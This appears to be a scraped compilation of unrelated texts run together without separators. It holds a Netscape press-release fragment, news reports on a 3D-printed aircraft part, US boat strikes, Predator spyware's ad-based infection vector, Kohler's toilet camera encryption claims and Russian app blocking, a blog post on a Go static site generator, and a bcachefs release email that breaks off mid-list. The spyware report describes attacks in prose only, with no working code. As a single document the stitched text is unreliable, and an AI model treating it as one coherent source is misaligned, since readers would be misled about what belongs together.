Netscape Communications, the Netscape Communications logo, Netscape, and Netscape Navigator are trademarks of Netscape Communications Corporation. JavaScript and Java are trademarks of Sun Microsystems, Inc. All other product names are trademarks of their respective companies.
WHAT COMPANIES SAY ABOUT JAVASCRIPT
Company Contacts:
America Online, Inc. Pam Mcgraw: (703) 556-3746
Apple Computer, Inc. Nancy Morrison: (408) 862-6200
Architext Software Mike Brogan/Roederer-Johnson: (415) 802-1850
AT&T Mary Whelan: (908) 658-6000
Borland International Bill Jordan: (408) 431-4721
Brio Technology, Inc. Yorgen Edholm: yhe@brio.com
Computer Associates, Inc. Yogesh Gupta: (516) 342-4045
Digital Equipment Corporation Ethel Kaiden: (508) 486-2814
Hewlett-Packard Company Bill Hodges: (408) 447-7041
Iconovex Corporation Robert Griggs: (800) 943-0292
Illustra Information Technologies, Inc. Sandra Bateman: (510) 873-6209
Informix Software, Inc. Cecilia Denny: (415) 926-6420
Intuit, Inc. Sheryl Ross: (415) 329-3569
Macromedia Miles Walsh: (415) 252-2000
Metrowerks, Inc. Greg Galanos: gpg@austin.metrowerks.com
Novell, Inc. Christine Hughes: (408) 577-7453
Oracle Corporation Mark Benioff: (415) 506-7000
Paper Software, Inc. Mike Mccue: (914) 679-2440
Precept Software, Inc. Judy Estrin: (408) 446-7600
RAD Technologies, Inc. Jeff Morgan: jmorgan@rad.com
The Santa Cruz Operation, Inc. Marty Picco: (408) 425-7222
Silicon Graphics, Inc. Virginia Henderson: (415) 933-1306
Spider Technologies Diana Jovin: (415) 969-6128
Sybase, Inc. Robert Manetta: (510) 922-5742
Verity, Inc. Marguerite Padovani: (415) 960-7724
Vermeer Technologies, Inc. Ed Cuoco: (617) 576-1700x130
Netscape Communications Corporation is a premier provider of open software for linking people and information over enterprise networks and the Internet. The company offers a full line of Netscape Navigator clients, Netscape servers, development tools and Netscape Internet Applications to create a complete platform for next-generation, live online applications. Traded on Nasdaq under the symbol "NSCP", Netscape Communications Corporation is based in Mountain View, California.
Netscape Communications, the Netscape Communications logo, Netscape, Netscape Commerce Server, Netscape Communications Server, Netscape Proxy Server and Netscape News Server are trademarks of Netscape Communications Corporation. NCSA Mosaic is a trademark of the University of Illinois. All other product names are trademarks of their respective companies.
Maisie Lillywhite
Gloucestershire
Air Accidents Investigation Branch
A plane crashed after a 3D-printed part softened and collapsed, causing its engine to lose power, a report has found.
The Cozy Mk IV light aircraft was destroyed after its plastic air induction elbow, bought at an air show in North America, collapsed.
The aircraft crashed into a landing aid system at Gloucestershire Airport in Staverton on 18 March at 13:04 GMT, after its engine lost power. The sole occupant was taken to hospital with minor injuries.
The Air Accidents Investigation Branch (AAIB) said in a report that the induction elbow was made of "inappropriate material" and safety actions will be taken in future regarding 3D printed parts.
Following an "uneventful local flight", the AAIB report said the pilot advanced the throttle on the final approach to the runway, and realised the engine had suffered a complete loss of power.
"He managed to fly over a road and a line of bushes on the airfield boundary, but landed short and struck the instrument landing system before coming to rest at the side of the structure," the report read.
It was revealed the part had been installed during a modification to the fuel system and collapsed due to its 3D-printed plastic material softening when exposed to heat from the engine.
The Light Aircraft Association (LAA) said it now intends to take safety actions in response to the accident, including a "LAA Alert" regarding the use of 3D-printed parts that will be sent to inspectors.
Lawmakers who saw a video of a U.S. attack on wounded and helpless people clinging to the wreckage of a supposed drug boat on September 2 described the footage as deeply disturbing.
A small number of members of the House Permanent Select Committee on Intelligence and the Senate and House Armed Services committees, as well as some staff directors, saw the recording during closed-door briefings Thursday with Adm. Frank M. Bradley , the head of Special Operations Command, and Gen. Dan Caine, the chair of the Joint Chiefs of Staff.
“What I saw in that room is one of the most troubling scenes I’ve ever seen in my time in public service,” said Rep. Jim Himes of Connecticut, the top Democrat on the House Intelligence Committee. “You have two individuals in clear distress without any means of locomotion with a destroyed vessel who were killed by the United States.”
Until Thursday, the only video of the attack that had been seen by lawmakers was an edited clip posted to the Truth Social account of President Donald Trump on September 2 announcing the strike. The edited clip captures the initial strike, showing a four-engine speedboat erupt in an explosion. It does not show the second strike on the wreckage of the vessel and the survivors — which was first reported by The Intercept .
Himes said the unedited video clearly shows the U.S. striking helpless people.
“Any American who sees the video that I saw will see the United States military attacking shipwrecked sailors — bad guys, bad guys, but attacking shipwrecked sailors,” he told The Intercept.
Himes said that Bradley — who conducted the follow-up strike as the then-commander of Joint Special Operations Command — “confirmed that there had not been a ‘kill them all’ order.” The Washington Post recently reported that Defense Secretary Pete Hegseth personally ordered the follow-up attack, giving a spoken order “to kill everybody.”
Sen. Jack Reed of Rhode Island, the top Democrat on the Armed Services Committee, also expressed dismay after watching the footage. “I am deeply disturbed by what I saw this morning. The Department of Defense has no choice but to release the complete, unedited footage of the September 2 strike, as the President has agreed to do,” he said on Thursday.
“This briefing confirmed my worst fears about the nature of the Trump Administration’s military activities, and demonstrates exactly why the Senate Armed Services Committee has repeatedly requested — and been denied — fundamental information, documents, and facts about this operation. This must and will be the only beginning of our investigation into this incident,” said Reed.
Trump has said he supports the release of the video showing the second boat strike that killed the remaining survivors of the initial September 2 attack . “I don’t know what they have, but whatever they have, we’d certainly release, no problem,” Trump told reporters in the Oval Office on Wednesday.
Brian Finucane, a former State Department lawyer who is a specialist in counterterrorism issues and the laws of war, told The Intercept that intense scrutiny needs to extend far beyond the first strike in the U.S. operation in the waters near Venezuela.
“Oversight needs to be broader than this one incident. It needs to cover the entire maritime bombing campaign. And it needs to go beyond the Department of Defense,” he told The Intercept. “We need to know how this policy was formulated in the first instance. What was the process by which some aspect of it got legal blessing from the Justice Department’s Office of Legal Counsel? That all needs to be drug out into the open.”
The military has carried out 21 known attacks, destroying 22 boats in the Caribbean Sea and eastern Pacific Ocean since September, killing at least 83 civilians . The most recent strike on a vessel was November 15.
Since the attacks began, experts in the laws of war and members of Congress, from both parties, have described the strikes as illegal extrajudicial killings because the military is not permitted to deliberately target civilians — even suspected criminals — who do not pose an imminent threat of violence. Throughout the long-running U.S. war on drugs, law enforcement agencies have arrested suspected drug smugglers rather than relying on summary executions. The double-tap strike first reported by The Intercept has only made worse a pattern of attacks that experts and lawmakers say are already tantamount to murder.
Sarah Harrison, who previously advised Pentagon policymakers on issues related to human rights and the law of war, cautioned against undue focus on the double-tap strike. “I can understand why the public and lawmakers are shocked by the second strike on Sept 2. The imagery of humans clinging to wreckage, likely severely injured, and then subsequently executed, is no doubt jarring. But we have to keep emphasizing to those who are conducting the strikes within DoD that there is no war, thus no law of war to protect them,” said Harrison, a former associate general counsel at the Pentagon’s Office of General Counsel, International Affairs. “All of the strikes, not just the Sept 2 incident, are extrajudicial killings of people alleged to have committed crimes. Americans should have been and should continue to be alarmed by that.”
The Pentagon continues to argue it is at war with undisclosed drug cartels and gangs. “I can tell you that every single person who we have hit thus far who is in a drug boat carrying narcotics to the United States is a narcoterrorist. Our intelligence has confirmed that, and we stand by it,” Pentagon press secretary Kingsley Wilson said Tuesday .
“There is no such thing as a narco-terrorist,” Himes said on Thursday. “Apparently, we have enough evidence to kill these people, but we don’t have enough evidence to try them in a court of law. People ought to sort of let that sink in and think about the implications of that.”
Sources briefed about the video footage say it contradicts a narrative that emerged in recent days that intercepted communications between the survivors and their supposed colleagues demonstrated those wounded individuals clinging to the wreckage were combatants, rather than shipwrecked and defenseless people whom it would be a war crime to target.
The Pentagon’s Law of War Manual is clear on attacking defenseless people. “Persons who have been rendered unconscious or otherwise incapacitated by wounds, sickness, or shipwreck, such that they are no longer capable of fighting, are hors de combat,” reads the guide using the French term for those out of combat. “Persons who have been incapacitated by wounds, sickness, or shipwreck are in a helpless state, and it would be dishonorable and inhumane to make them the object of attack.”
“The notion that radioing for help forfeits your shipwreck status is absurd — much less than it enables them to target you,” said Finucane. “I don’t believe there’s an armed conflict, so none of these people are lawful targets. They weren’t combatants, they’re not participating in hostilities. So the whole construct is ridiculous. But even if you accept that this is some sort of law of war situation, radioing for help does not deprive you of shipwreck status or render you a target under the law of war.”
The Predator spyware from surveillance company Intellexa has been using a zero-click infection mechanism dubbed “Aladdin,” which compromised specific targets by simply viewing a malicious advertisement.
This powerful and previously unknown infection vector is meticulously hidden behind shell companies spread across multiple countries, now uncovered in a new joint investigation by Inside Story, Haaretz, and WAV Research Collective.
The investigation is based on 'Intellexa Leaks' - a collection of leaked internal company documents and marketing material, and is corroborated by technical research from forensic and security experts at Amnesty International, Google, and Recorded Future.
First deployed in 2024 and believed to still be operational and actively developed, Aladdin leverages the commercial mobile advertising system to deliver malware.
The mechanism forces weaponized ads onto specific targets identified by their public IP address and other identifiers, instructing the ad platforms, via a Demand Side Platform (DSP), to serve the ad on any website participating in the ad network.
“This malicious ad could be served on any website that displays ads, such as a trusted news website or mobile app, and would appear like any other ad that the target is likely to see,” explains Amnesty International’s Security Lab .
“Internal company materials explain that simply viewing the advertisement is enough to trigger the infection on the target’s device, without any need to click on the advertisement itself.”
Although no details are available on how the infection works, Google mentions that the ads trigger redirections to Intellexa’s exploit delivery servers.
The ads are funneled through a complex network of advertising firms spread across multiple countries, including Ireland, Germany, Switzerland, Greece, Cyprus, the UAE, and Hungary.
Recorded Future dug deeper into the advertising network, connecting the dots between key people, firms, and infrastructure, and naming some of those companies in its report .
Defending against those malicious ads is complex, but blocking ads on the browser would be a good starting point.
Another potential defense measure would be to set the browser to hide the public IP from trackers.
However, the leaked documents show that Intellexa can still obtain the information from domestic mobile operators in their client’s country.
Another key finding in the leak is confirmation of the existence of another delivery vector called 'Triton', which can target devices with Samsung Exynos chipsets using baseband exploits, forcing 2G downgrades to lay the groundwork for infection.
Amnesty International’s analysts are unsure whether this vector is still used and note that there are two other, possibly similar delivery mechanisms, codenamed 'Thor' and 'Oberon', believed to involve radio communications or physical access attacks.
Google’s researchers name Intellexa as one of the most prolific commercial spyware vendors in terms of zero-day exploitation, responsible for 15 out of the 70 cases of zero-day exploitation TAG discovered and documented since 2021.
Google says Intellexa develops its own exploits and also purchases exploit chains from external entities to cover the full spectrum of required targeting.
Despite sanctions and ongoing investigations against Intellexa in Greece, the spyware operator is as active as ever, according to Amnesty International.
As Predator becomes stealthier and harder to trace, users should consider enabling extra protections on their mobile devices, such as Advanced Protection on Android and Lockdown Mode on iOS.
Home goods company Kohler would like to put a camera in your toilet to take some photos. It’s OK, though, the company has promised that all the data it collects on your “waste” will be “end-to-end encrypted.” However, a deeper look into the company’s claim by technologist Simon Fondrie-Teitler revealed that Kohler seems to have no idea what E2EE actually means. According to Fondrie-Teitler’s write-up, which was first reported by TechCrunch, the company will have access to the photos the camera takes and may even use them to train AI.
The whole fiasco gives an entirely too on-the-nose meaning to the “Internet of Shit.”
Kohler launched its $600 camera to hang on your toilets earlier this year. It’s called Dekoda, and along with the large price tag, the toilet cam also requires a monthly service fee that starts at $6.99. If you want to track the piss and shit of a family of 6, you’ll have to pay $12.99 a month.
What do you get for putting a camera on your toilet? According to Kohler’s pitch , “health & wellness insights” about your gut health and “possible signs of blood in the bowl” as “Dekoda uses advanced sensors to passively analyze your waste in the background.”
If you’re squeamish about sending pictures of your family’s “waste” to Kohler, the company promised that all of the data is “end-to-end encrypted.” The privacy page for Kohler Health says “user data is encrypted end to end, at rest and in transit,” and the claim is mentioned in several places in the marketing.
It’s not, though. Fondrie-Teitler told 404 Media he started looking into Dekoda after he noticed friends making fun of it in a Slack he’s part of. “I saw the ‘end-to-end encryption’ claim on the homepage, which seemed at odds with what they said they were collecting in the privacy policy,” he said. “Pretty much every other company I've seen implement end-to-end encryption has published a whitepaper alongside it. Which makes sense, the details really matter so telling people what you've done is important to build trust. Plus it's generally a bunch of work so companies want to brag about it. I couldn't find any more details though.”
E2EE has a specific meaning . It’s a type of messaging system that keeps the contents of a message private while in transit, meaning only the person sending and the person receiving a message can view it. Famously, E2EE means that the messaging company itself cannot decode or see the messages (Signal, for example, is E2EE). The point is to protect the privacy of individual users from a company prying into data if a third party, like the government, comes asking for it.
Kohler, it’s clear, has access to a user’s data. This means it’s not E2EE. Fondrie-Teitler told 404 Media that he downloaded the Kohler health app and analyzed the network traffic it sent. “I didn't see anything that would indicate an end-to-end encrypted connection being created,” he said.
Then he reached out to Kohler and had a conversation with its privacy team via email. “The Kohler Health app itself does not share data between users. Data is only shared between the user and Kohler Health,” a member of the privacy team at Kohler told Fondrie-Teitler in an email reviewed by 404 Media. “User data is encrypted at rest, when it’s stored on the user's mobile phone, toilet attachment, and on our systems. Data in transit is also encrypted end-to-end, as it travels between the user's devices and our systems, where it is decrypted and processed to provide our service.”
If Kohler can view the user’s data, as it admits to doing in this email exchange with Fondrie-Teitler, then it’s not—by definition—using E2EE. Kohler did not immediately respond to 404 Media’s request for comment.
“I'd like the term ‘end-to-end encryption’ to not get watered down to just meaning ‘uses https’ so I wanted to see if I could confirm what it was actually doing and let people know,” Fondrie-Teitler told 404 Media. He pointed out that Zoom once made a similar claim and had to pay a fine to the FTC because of it.
“I think everyone has a right to privacy, and in order for that to be realized people need to have an understanding of what's happening with their data,” Fondrie-Teitler said. “It's already so hard for non-technical individuals (and even tech experts) to evaluate the privacy and security of the software and devices they're using. E2EE doesn't guarantee privacy or security, but it's a non-trivial positive signal and losing that will only make it harder for people to maintain control over their data.”
About the author
Matthew Gault is a writer covering weird tech, nuclear war, and video games. He’s worked for Reuters, Motherboard, and the New York Times.
Russian authorities blocked access to Snapchat and imposed restrictions on Apple’s video calling service, FaceTime, the latest step in an effort to tighten control over the internet and communications online, according to state-run news agencies and the country’s communications regulator.
The state internet regulator Roskomnadzor alleged in a statement that both apps were being “used to organize and conduct terrorist activities on the territory of the country, to recruit perpetrators [and] commit fraud and other crimes against our citizens”. Apple did not respond to an emailed request for comment, nor did Snap Inc.
The Russian regulator said it took action against Snapchat on 10 October, even though it only reported the move on Thursday. The moves follow restrictions against Google’s YouTube, Meta’s WhatsApp and Instagram, and the Telegram messaging service, itself founded by a Russian-born man, that came in the wake of Vladimir Putin’s invasion of Ukraine in 2022.
Under Vladimir Putin, authorities have engaged in deliberate and multi-pronged efforts to rein in the internet. They have adopted restrictive laws and banned websites and platforms that don’t comply. Technology has also been perfected to monitor and manipulate online traffic.
Access to YouTube was disrupted last year in what experts called deliberate throttling of the widely popular site by the authorities. The Kremlin blamed YouTube owner Google for not properly maintaining its hardware in Russia.
While it’s still possible to circumvent some of the restrictions by using virtual private network services, those are routinely blocked, too.
Authorities further restricted internet access this summer with widespread shutdowns of cellphone internet connections. Officials have insisted the measure was needed to thwart Ukrainian drone attacks, but experts argued it was another step to tighten internet control. In dozens of regions, “white lists” of government-approved sites and services that are supposed to function despite a shutdown have been introduced.
The government has also acted against popular messaging platforms. The encrypted messenger Signal and another popular app, Viber, were blocked in 2024. This year, authorities banned calls via WhatsApp, the most popular messaging app in Russia, and Telegram, a close second. Roskomnadzor justified the measure by saying the two apps were being used for criminal activities.
At the same time, authorities actively promoted a “national” messenger app called Max, which critics see as a surveillance tool. The platform, touted by developers and officials as a one-stop shop for messaging, online government services, making payments and more, openly declares it will share user data with authorities upon request. Experts also say it does not use end-to-end encryption.
Earlier this week, the government also said it was blocking Roblox, a popular online game platform, saying the step aimed at protecting children from illicit content and “pedophiles who meet minors directly in the game’s chats and then move on to real life”. Roblox in October was the second most popular game platform in Russia, with nearly 8 million monthly users, according to the media monitoring group Mediascope.
Stanislav Seleznev, cyber security expert and lawyer with the Net Freedom rights group, said that Russian law views any platform where users can message each other as “organizers of dissemination of information”.
This label mandates that platforms register an account with Roskomnadzor so that the regulator can communicate its demands, and that they give Russia’s security service, the FSB, access to their users’ accounts for monitoring; those failing to comply are in violation and can be blocked, Seleznev said.
Seleznev estimated that possibly tens of millions of Russians have been using FaceTime, especially after calls were banned on WhatsApp and Telegram. He called the restrictions against the service “predictable” and warned that other sites failing to cooperate with Roskomnadzor “will be blocked – that’s obvious”.
I stumbled across the Refactoring English book this summer. It got me motivated to try (technical) writing myself. However, I needed a simple way to publish blog posts and an excuse for why I couldn't start writing immediately. So, me being in developer mode, I told myself:
"First things first, instead of practicing my writing, reading the book or sketching drafts of what I actually could write about, start with a custom static site generator."
But this now became the first article here on nobloat.org and I like it.
This blog is generated by 400 lines of handwritten Go code, mainly because it is fun, but also because I was annoyed by all the breaking changes with each update of existing solutions.
This can't happen anymore :)
The static site generator ecosystem is vast, but most solutions come with significant complexity. From a writing perspective, the biggest issue was in fact getting a setup that works without distraction and looks good to me.
Hugo is fast and popular, and I have used it in the past. But it's a massive framework with hundreds of features I'd never use but still have to pay for in complexity tokens. The configuration files, theme system, and plugin ecosystem add layers of abstraction that make it hard to understand what's actually happening. When something breaks or I want to customize behavior, there is too much for me to reason about. And I have had issues in the past where untouched static websites suddenly would no longer build after one or two years.
Jekyll requires Ruby, Bundler, and a complex gem ecosystem. Every time I'd want to update or deploy, I'd need to ensure the right Ruby version, manage gem dependencies, and deal with potential version conflicts. The overhead of maintaining a Ruby environment just to generate static HTML felt excessive. The same issue applies to Pelican, just with Python instead of Ruby.
Next.js and other React-based static site generators are powerful, but they bring the entire JavaScript ecosystem with them. Node modules, build tools, transpilation, and the constant churn of the npm ecosystem—all for what is essentially text processing and template rendering.
Even simpler tools like Zola or 11ty still require learning their specific conventions, configuration formats, and template languages. They're better than the heavyweights, but they're still frameworks with their own abstractions.
What I needed was:
None of the existing solutions met these requirements. They either required complex setup, had too many dependencies, introduced unnecessary abstractions, or were too opinionated about structure. Plus, this seemed like a fun project for a sunny afternoon in the park.
The implementation consists of two Go files: main.go (core functionality) and data.go (site configuration), with no external dependencies beyond the standard library. It reads Markdown files, converts them to HTML, generates an index page, creates an RSS feed, and outputs everything to a public/ directory. The entire codebase is under 400 lines and does exactly what I need, nothing more.
The blog generator follows a simple workflow:
Posts are Markdown files in the articles/ directory, named with a date prefix: YYYY-MM-DD-title.md. The date prefix serves two purposes: it provides the publication date for sorting and RSS feeds, and it makes chronological organization obvious when browsing files.
articles/
  2025-07-01-hello-blog.md
  2025-12-03-x-platform-translation-system.md
The first line of each Markdown file is treated as the title (a # Heading), and the rest is converted to HTML content.
The markdown parser is intentionally minimal. It handles:
- headings (#, ##, ###)
- unordered lists (- item)
- inline formatting (code, links, images)
The parser steps through each line of the markdown file and converts the supported expressions into HTML. For lists and code blocks, it keeps track of whether it is still inside a list or a code snippet.
The code snippet below is shortened to show only the relevant parts.
func parseMarkdown(input string) (content string, title string) {
    lines := strings.Split(input, "\n")
    var out strings.Builder
    inList := false
    inCode := false
    codeLang := ""
    if len(lines) > 0 && strings.HasPrefix(lines[0], "# ") {
        title = strings.TrimPrefix(lines[0], "# ")
    }
    for _, raw := range lines {
        line := strings.TrimSpace(raw)
        if strings.HasPrefix(line, "```") {
            if inCode {
                out.WriteString("</code></pre>\n</div>\n")
                inCode = false
                continue
            }
            inCode = true
            codeLang = strings.TrimSpace(strings.TrimPrefix(line, "```"))
            if codeLang == "" {
                out.WriteString("<pre><code>")
            } else {
                out.WriteString(fmt.Sprintf("<pre><code class=\"language-%s\">", codeLang))
            }
            continue
        }
        if inCode {
            out.WriteString(html.EscapeString(raw) + "\n")
            continue
        }
        if inList && line == "" {
            out.WriteString("</ul>\n")
            inList = false
            continue
        }
        switch {
        case strings.HasPrefix(line, "> "):
            if inList {
                out.WriteString("</ul>\n")
                inList = false
            }
            quote := formatInline(strings.TrimPrefix(line, "> "))
            out.WriteString("<blockquote><p>" + quote + "</p></blockquote>\n")
        case strings.HasPrefix(line, "# "):
            if inList {
                out.WriteString("</ul>\n")
                inList = false
            }
            heading := formatInline(strings.TrimPrefix(line, "# "))
            out.WriteString("<h1>" + heading + "</h1>\n")
        case strings.HasPrefix(line, "- "):
            if !inList {
                out.WriteString("<ul>\n")
                inList = true
            }
            item := formatInline(strings.TrimPrefix(line, "- "))
            out.WriteString("<li>" + item + "</li>\n")
        case line == "":
            if inList {
                out.WriteString("</ul>\n")
                inList = false
            }
        default:
            if inList {
                out.WriteString("</ul>\n")
                inList = false
            }
            out.WriteString("<p>" + formatInline(line) + "</p>\n")
        }
    }
    if inList {
        out.WriteString("</ul>\n")
    }
    if inCode {
        out.WriteString("</code></pre>\n</div>\n")
    }
    return out.String(), title
}
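The formatInline helper used above is not shown in the snippet. As an illustration, here is a minimal sketch of what such a helper could look like, using only the standard library's regexp and html packages; the regular expressions and the exact set of supported inline elements are assumptions for this example, not the blog's actual code.
// Hypothetical sketch of an inline formatter for code spans, images and links.
// The regexes are illustrative assumptions, not the original implementation.
var (
    inlineCodeRe = regexp.MustCompile("`([^`]+)`")
    imageRe      = regexp.MustCompile(`!\[([^\]]*)\]\(([^)]+)\)`)
    linkRe       = regexp.MustCompile(`\[([^\]]+)\]\(([^)]+)\)`)
)

func formatInline(s string) string {
    // Escape first so user text cannot inject raw HTML.
    s = html.EscapeString(s)
    s = inlineCodeRe.ReplaceAllString(s, "<code>$1</code>")
    // Images are handled before links so the leading "!" is consumed.
    s = imageRe.ReplaceAllString(s, `<img src="$2" alt="$1">`)
    s = linkRe.ReplaceAllString(s, `<a href="$2">$1</a>`)
    return s
}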
The loadPosts() function scans the articles directory, reads each .md file, parses the date from the filename prefix, converts Markdown to HTML, and sorts posts by date in descending order (newest first).
func loadPosts(dir string) []Post {
    files, _ := os.ReadDir(dir)
    var posts []Post
    for _, f := range files {
        if strings.HasSuffix(f.Name(), ".md") {
            // Parse date from filename: YYYY-MM-DD-title.md
            dateStr := f.Name()[:10]
            postDate, err := time.Parse("2006-01-02", dateStr)
            if err != nil {
                log.Printf("skipping %s: filename does not start with YYYY-MM-DD", f.Name())
                continue
            }
            // Convert markdown to HTML and collect the post (shortened here)
            posts = append(posts, Post{Date: postDate})
        }
    }
    // Sort by date, newest first
    sort.Slice(posts, func(i, j int) bool {
        return posts[i].Date.After(posts[j].Date)
    })
    return posts
}
If a file doesn't match the expected format, it logs a warning and skips it, ensuring only properly formatted posts are included.
The generator creates three types of HTML:
- Index Page (index.html): lists all posts with links, plus a links section for external resources.
- Post Pages (YYYY-MM-DD-title.html): individual post pages with navigation back to the index.
- RSS Feed (feed.xml): a standard Atom feed for RSS readers.
All HTML is generated using Go's html/template package, which is part of the standard library. Templates are read from simple HTML files (index.html and article.html) that use Go's template syntax; no complex template system, just straightforward HTML with template variables.
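For readers less familiar with html/template, a minimal sketch of this kind of rendering might look like the following. The IndexData shape, the template file name, the output path, and the Post fields referenced in the template are assumptions made for illustration, not the generator's actual code.
// Minimal sketch: render the index template with Go's html/template.
// IndexData and the paths below are assumptions for this example.
type IndexData struct {
    Title string
    Posts []Post
}

func writeIndex(posts []Post) error {
    tmpl, err := template.ParseFiles("index.html")
    if err != nil {
        return err
    }
    f, err := os.Create("public/index.html")
    if err != nil {
        return err
    }
    defer f.Close()
    return tmpl.Execute(f, IndexData{Title: "][ nobloat.org", Posts: posts})
}
A template line like {{range .Posts}}<li><a href="{{.Link}}">{{.Title}}</a></li>{{end}} would then be enough to render the post list.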
Site metadata is stored in data.go as a simple Go struct. This includes the site title, slogan, base URL, links, projects, and tools that appear on the index page. The configuration is just a variable declaration, hence no YAML, no JSON, no complex config parsing.
To change the site title or add a link, I just edit data.go directly.
var config = Config{
Title: "][ nobloat.org",
Slogan: "pragmatic software minimalism",
BaseURL: "https://nobloat.org",
Links: map[string]string{
"Choosing boring technology": "https://boringtechnology.club/",
// ...
},
// ...
}
For development, main.go includes a --watch flag that uses the fsnotify package to monitor the articles directory, CSS file, template files, and the generator itself. When any file changes, it automatically rebuilds the site.
When you modify content, templates, or CSS, changes are detected immediately and the site rebuilds automatically. Edit a post, see it update. Modify the HTML templates, get instant feedback. Change the stylesheet, see the new styles applied.
It does not, however, detect changes to the *.go files themselves, because that would require a slightly more complex restart mechanism and I rarely touch them anyway.
The fsnotify package (github.com/fsnotify/fsnotify) is the only external dependency, and it's only needed for the watch feature. The core build functionality requires no external packages.
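To give an idea of what such a watch mode can look like with fsnotify, here is a minimal sketch; the function name, the rebuild callback, and the exact set of watched events are assumptions for illustration, not the actual implementation.
// Hypothetical sketch of a watch-and-rebuild loop built on fsnotify.
// The rebuild callback and watched paths are assumptions for this example.
func watchAndRebuild(paths []string, rebuild func() error) error {
    watcher, err := fsnotify.NewWatcher()
    if err != nil {
        return err
    }
    defer watcher.Close()
    for _, p := range paths {
        if err := watcher.Add(p); err != nil {
            return err
        }
    }
    for {
        select {
        case ev, ok := <-watcher.Events:
            if !ok {
                return nil
            }
            // Rebuild on writes, creates, renames and removals.
            if ev.Op&(fsnotify.Write|fsnotify.Create|fsnotify.Rename|fsnotify.Remove) != 0 {
                log.Printf("change detected: %s, rebuilding", ev.Name)
                if err := rebuild(); err != nil {
                    log.Printf("rebuild failed: %v", err)
                }
            }
        case err, ok := <-watcher.Errors:
            if !ok {
                return nil
            }
            log.Printf("watch error: %v", err)
        }
    }
}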
This blog generator does exactly what I need: it converts Markdown to HTML, generates an index and RSS feed, and outputs static files. It's under 400 lines of code, uses only the Go standard library for core functionality, and I understand every part of it.
It might not be suitable for someone who needs complex features like tags, categories, pagination, or theme systems. But for a simple blog, it's perfect. It fits the "nobloat" philosophy.
The entire codebase is very small, making it easy to read, modify, and maintain.
And the best part for me personally: I don't need node, npm or similar tools to build this. Local preview is just opening public/index.html in Firefox. Deployment is a single rsync:
rsync -av --delete public/ user@host:html/blog/
I do have a few ideas for further topics to write about in the context of nobloat. Taking the courage to publish this was the biggest step for me.
Feedback is always welcome at dev@spiessknafl.at.
From: Kent Overstreet <kent.overstreet@linux.dev>
To: linux-bcachefs@vger.kernel.org
Subject: bcachefs 1.33.0 - reconcile
Date: Thu, 4 Dec 2025 12:35:59 -0500
Message-ID: <slvis5ybvo7ch3vxh5yb6turapyq7hai2tddwjriicfxqivnpn@xdpb25wey5xd>

Biggest new feature in the past ~2 years, I believe. The user facing stuff may be short and sweet - but so much going on under the hood to make all this smooth and polished.

Big thank you to everyone who helped out with testing, design feedback, and more. As always, keep the bug reports coming - you find 'em, we fix 'em :)

Cheers, Kent

Changelog:
==========

`bcachefs_metadata_version_reconcile` (formerly known as rebalance_v2)

### Reconcile

An incompatible upgrade is required to enable reconcile.

Reconcile now handles all IO path options; previously only the background target and background compression options were handled.

Reconcile can now process metadata (moving it to the correct target, rereplicating degraded metadata); previously rebalance was only able to handle user data.

Reconcile now automatically reacts to option changes and device setting changes, and immediately rereplicates degraded data or metadata.

This obsoletes the commands `data rereplicate`, `data job drop_extra_replicas`, and others; the new commands are `reconcile status` and `reconcile wait`.

The recovery pass `check_reconcile_work` now checks that data matches the specified IO path options, and flags an error if it does not (if it wasn't due to an option change that hasn't yet been propagated).

Additional improvements over rebalance and implementation notes:

We now have a separate index for data that's scheduled to be processed by reconcile but can't be (e.g. because the specified target is full), `BTREE_ID_reconcile_pending`; this solves long standing reports of rebalance spinning when a filesystem has more data than fits on the specified background target. This also means you can create a single device filesystem with replicas=2, and upon adding a new device data will automatically be replicated on the new device, no additional user intervention required.

There's a separate index for "high priority" reconcile processing - `BTREE_ID_reconcile_hipri`. This is used for degraded extents that need to be rereplicated; they'll be processed ahead of other work.

Rotating disks get special handling. We now track whether a disk is rotational (a hard drive, instead of an SSD); pending work on those disks is additionally indexed in the `BTREE_ID_reconcile_work_phys` and `BTREE_ID_reconcile_hipri_phys` btrees so they can be processed in physical LBA order, not logical key order, avoiding unnecessary seeks. We don't yet have the ability to change the rotational setting on an existing device, once it's been set; if you discover you need this, please let us know so it can be bumped up on the list (it'll be a medium sized project).

`BCH_MEMBER_STATE_failed` has been renamed to `BCH_MEMBER_STATE_evacuating`; as the name implies, reconcile automatically moves data off of devices in the evacuating state. In the future, when we have better tracking and monitoring of drive health, we'll be able to automatically mark failing devices as evacuating: when this lands, you'll be able to load up a server with disks and walk away - come back a year later to swap out the ones that have failed.

Reconcile was a massive project: the short and simple user interface is deceptive; there was an enormous amount of work under the hood to make everything work consistently and handle all the special cases we've learned about over the past few years with rebalance.

There's still reconcile-related work to be done on disk space accounting when devices are read-only or evacuating, and in the future we want to reserve space up front on option change, so that we can alert the user if they might be doing something they don't have disk space for.

### Other improvements and changes:

- Degraded data is now always properly reported as degraded (by `bcachefs fs usage`); data is considered degraded any time the durability on good (non-evacuating) devices is less than the specified replication level.

- Counters (shown by `bcachefs fs top`) and tracepoints have gotten a giant cleanup and rework: every counter has a corresponding tracepoint. This makes it easy to drill down and investigate when a filesystem is doing something unusual and unexpected.

  Under the hood, the conversion of tracepoints to printbufs/pretty printers has now been completed, with some much improved helpers. This makes it much easier to add new counters and tracepoints or add additional info to existing tracepoints, typically a 5-20 line patch. If there's something you're investigating and you need more info, just ask.

  We now make use of type information on counters to display data rates in `bcachefs fs top` where applicable, and many counters have been converted to data rates. This makes it much easier to correlate different counters (e.g. `data_update`, `data_update_fail`) to check if the rates of slowpath events should be a cause for concern.

- Logging/error message improvements

  Logging has been a major area of focus, with a lot of under the hood improvements to make it ergonomic to generate messages that clearly explain what the system is doing and why: error messages should not include just the error, but how it was handled (soft error or hard error) and all actions taken to correct the error (e.g. scheduling self healing or recovery passes).

  When we receive an IO error from the block layer we now report the specific error code we received (e.g. `BLK_STS_IOERR`, `BLK_STS_INVAL`).

  The various write paths (user data, btree, journal) now report one error message for the entire operation that includes all the sub-errors for the individual replicated writes and the status of the overall operation (soft error (wrote degraded data) vs. hard error), like the read paths.

  On failure to mount due to insufficient devices, we now report which device(s) were missing; we remember the device name and model in the superblock from the last time we saw it so that we can give helpful hints to the user about what's missing.

  When btree topology repair recovers via btree node scan, we now report which node(s) it was able to recover via scan; this helps with determining if data was actually lost or not.

  We now ratelimit soft and hard errors separately, in the data/journal/btree read and write paths, ensuring that if the system is being flooded with soft errors the hard errors will still be reported. All error ratelimiting now obeys the `no_ratelimit_errors` option.

  All recovery passes should now have progress indicators.

- New options:

